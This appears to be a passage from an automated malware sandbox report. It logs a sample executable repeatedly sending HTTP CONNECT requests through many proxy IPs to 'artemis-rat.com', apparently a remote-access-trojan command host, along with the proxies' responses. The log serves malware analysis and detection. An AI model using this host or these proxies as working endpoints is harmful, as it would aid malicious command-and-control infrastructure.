                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.405364990 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.548204899 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.902420998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            758192.168.2.55217834.83.143.631283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.525176048 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.723443031 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            759192.168.2.551965103.190.54.141803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.525192022 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            760192.168.2.551967103.190.54.14180803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.525532961 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            761192.168.2.551519135.148.10.16139703876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.549424887 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            762192.168.2.552033103.76.253.6631293876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.550057888 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:58.020524025 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            763192.168.2.552053221.6.139.19090023876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.550431967 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.077491999 CET311INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:40 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 166
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            764192.168.2.55203435.154.71.7210803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.550595045 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.946753979 CET116INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:40 GMT
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                                            Content-Length: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            765192.168.2.55218938.162.23.2431283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.550960064 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.965552092 CET111INHTTP/1.1 407 Proxy Authentication Required
                                                                                                                                                                                                                                                            Proxy-Authenticate: Basic realm=""
                                                                                                                                                                                                                                                            Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                                                                                                                                                                                                                                            Data Ascii: Proxy Authentication Required


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            766192.168.2.552028222.138.76.690023876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.551532984 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.963229895 CET311INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:40 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 166
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            767192.168.2.55158650.63.12.33147383876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.559613943 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            768192.168.2.551433103.81.221.10180803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.560319901 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.648493052 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            769192.168.2.55224672.167.221.157647423876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.563183069 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            770192.168.2.55212945.4.144.23241533876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.566601992 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            771192.168.2.55223092.204.135.37586043876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.570609093 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.092344046 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.811336040 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.217612982 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            772192.168.2.55214651.89.173.40317243876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.570610046 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            773192.168.2.552249162.241.158.204505633876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.579627991 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.092345953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.811261892 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.108345985 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.608529091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.202213049 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.723165035 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:55.717564106 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            774192.168.2.55213594.131.14.6610813876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.579654932 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            775192.168.2.55215558.234.116.19781933876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.580598116 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            776192.168.2.55223392.204.134.3877853876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.582449913 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            777192.168.2.552143181.12.80.21120003876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.584666967 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            778192.168.2.54985637.32.98.16089983876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.586561918 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.701914072 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.702380896 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.702507019 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            779192.168.2.552243159.223.166.21455373876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.587518930 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.201873064 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            780192.168.2.552023223.112.53.210253876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.590306044 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.454183102 CET34INHTTP/1.1 503 Service Unavailable


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            781192.168.2.552220181.78.73.739993876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.595635891 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.201931000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.092842102 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
